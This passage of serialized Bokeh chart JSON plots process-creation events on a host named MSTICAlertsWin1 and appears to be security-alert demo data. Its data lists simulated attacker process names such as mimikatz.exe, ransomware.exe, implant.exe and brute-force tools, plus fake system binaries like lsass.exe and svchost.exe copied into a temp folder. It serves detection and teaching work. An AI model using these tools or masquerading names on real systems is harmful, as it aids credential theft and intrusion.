AiHT+hHZCALCKdP6EdkIAoPZ0/oR2QgAABXX+hHZCAKDIn/yEdkIA4Mmf/IR2QgDwKqD8hHZCAABFoPyEdkIAAG8c/IR2QgAAmCr8hHZCABCZKvyEdkIAkAor/IR2QgBwFSv8hHZCAADPBv2EdkIAAPgU/YR2QgAQ+RT9hHZCALBOFf2EdkIA0FEV/YR2QgBwdRX9hHZCAIAJH/2EdkIAUAof/YR2QgAAGyT9hHZCAACLxPuEdkIAALTS+4R2QgAQtdL7hHZCAPAM0/uEdkIAcDHT+4R2QgAAU3T8hHZCAKB8gvyEdkIAsH2C/IR2QgAg44L8hHZCAAD5gvyEdkIAALs5/IR2QgDQZkL8hHZCADDkR/yEdkIAQOVH/IR2QgCgUkj8hHZCANBhSPyEdkIAIBxK/IR2QgAAQ77+hHZCAHBszP6EdkIAcG3M/oR2QgCww8z+hHZCAGDPzP6EdkIAMOnM/oR2QgCgB1f8hHZCAHAwZfyEdkIAcDFl/IR2QgDgmmX8hHZCAACtZfyEdkIAMAQH/4R2QgBABQf/hHZCANBeB/+EdkIAcIEH/4R2QgAAI//7hHZCAPBPA/yEdkIAAEwN/IR2QgAQTQ38hHZCALCdDfyEdkIAAMkN/IR2QgAARDL9hHZCABBFMv2EdkIAsLgy/YR2QgBwwTL9hHZCAMB7Nf2EdkIAkHw1/YR2QgAA1+H7hHZCABAB8PuEdkIA4AHw+4R2QgAAVfD7hHZCAKB98PuEdkIAAPOJ+4R2QgBwHJj7hHZCALAdmPuEdkIA4HyY+4R2QgAAmZj7hHZCAHDoXv+EdkIAcOle/4R2QgBwXF//hHZCAHBlX/+EdkIAAAtu/4R2QgAAS5n9hHZCAAB0p/2EdkIAQHWn/YR2QgDQ2Kf9hHZCANDxp/2EdkIAEHwO/oR2QgAwpBz+hHZCABClHP6EdkIAMPkc/oR2QgAAIR3+hHZCAAATSf6EdkIAADxX/oR2QgBAPVf+hHZCANCuV/6EdkIAcLlX/oR2QgBwxyv+hHZCAABIMv6EdkIAAPA5/oR2QgCw8Tn+hHZCANBAOv6EdkIAMG06/oR2QgBA+jr+hHZCAOD6Ov6EdkIAAOPT/YR2QgAwDOL9hHZCAEAN4v2EdkIAIGni/YR2QgAAieL9hHZCAACXtv2EdkIAMMDE/YR2QgBAwcT9hHZCAFAhxf2EdkIAcD3F/YR2QgAAL/H9hHZCANBY//2EdkIA4Fn//YR2QgAwsf/9hHZCAKDV//2EdkIAsApB/YR2QgBwZ0H9hHZCANDtQf2EdkIAEJFP/YR2QgAQkk/9hHZCAIAAUP2EdkIAcA1Q/YR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[203]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,70,71,72,73,74,75,83,84,86,87,88,95,133,134,135,179,180,181,182,183,184,185,186,187,188,189,219,220,228,229,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1396\"},\"selection_policy\":{\"id\":\"1397\"}},\"id\":\"1300\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1403\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_multi\":{\"id\":\"1363\"},\"tools\":[{\"id\":\"1363\"}]},\"id\":\"1349\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1404\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1368\"},\"major_label_policy\":{\"id\":\"1389\"},\"ticker\":{\"id\":\"1314\"}},\"id\":\"1313\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1386\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis\":{\"id\":\"1345\"},\"ticker\":null},\"id\":\"1348\",\"type\":\"Grid\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1398\"},{\"id\":\"1399\"},{\"id\":\"1400\"},{\"id\":\"1401\"},{\"id\":\"1402\"},{\"id\":\"1403\"},{\"id\":\"1404\"},{\"id\":\"1405\"},{\"id\":\"1406\"},{\"id\":\"1407\"},{\"id\":\"1408\"},{\"id\":\"1409\"}]},\"id\":\"1314\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1406\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1388\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"source\":{\"id\":\"1299\"}},\"id\":\"1374\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1311\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1368\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\MSTICAdmin\"},\"renderers\":[{\"id\":\"1373\"}]},\"id\":\"1375\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1407\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1313\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1316\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1409\",\"type\":\"YearsTicker\"},{\"attributes\":{\"label\":{\"value\":\"WORKGROUP\\\\MSTICAlertsWin1$\"},\"renderers\":[{\"id\":\"1379\"}]},\"id\":\"1381\",\"type\":\"LegendItem\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1408\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1388\"},\"major_label_policy\":{\"id\":\"1386\"},\"ticker\":{\"id\":\"1318\"},\"visible\":false},\"id\":\"1317\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1318\",\"type\":\"BasicTicker\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1351\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1414\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1371\",\"type\":\"Scatter\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1411\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1355\",\"type\":\"Circle\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1412\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1413\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1317\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1320\",\"type\":\"Grid\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":\"10px\"},\"id\":\"1350\",\"type\":\"Title\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1354\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1415\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1335\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"1364\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"end\":1547530487011.5,\"start\":1547525104998.5},\"id\":\"1337\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1339\",\"type\":\"DataRange1d\"},{\"attributes\":{\"data_source\":{\"id\":\"1299\"},\"glyph\":{\"id\":\"1354\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1355\"},\"view\":{\"id\":\"1357\"}},\"id\":\"1356\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1321\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1416\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"1299\"}},\"id\":\"1357\",\"type\":\"CDSView\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"1417\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1326\"}},\"id\":\"1322\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"data\":{\"NewProcessName\":[\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.ex\\ne\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\"],\"ParentProcessName\":[\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.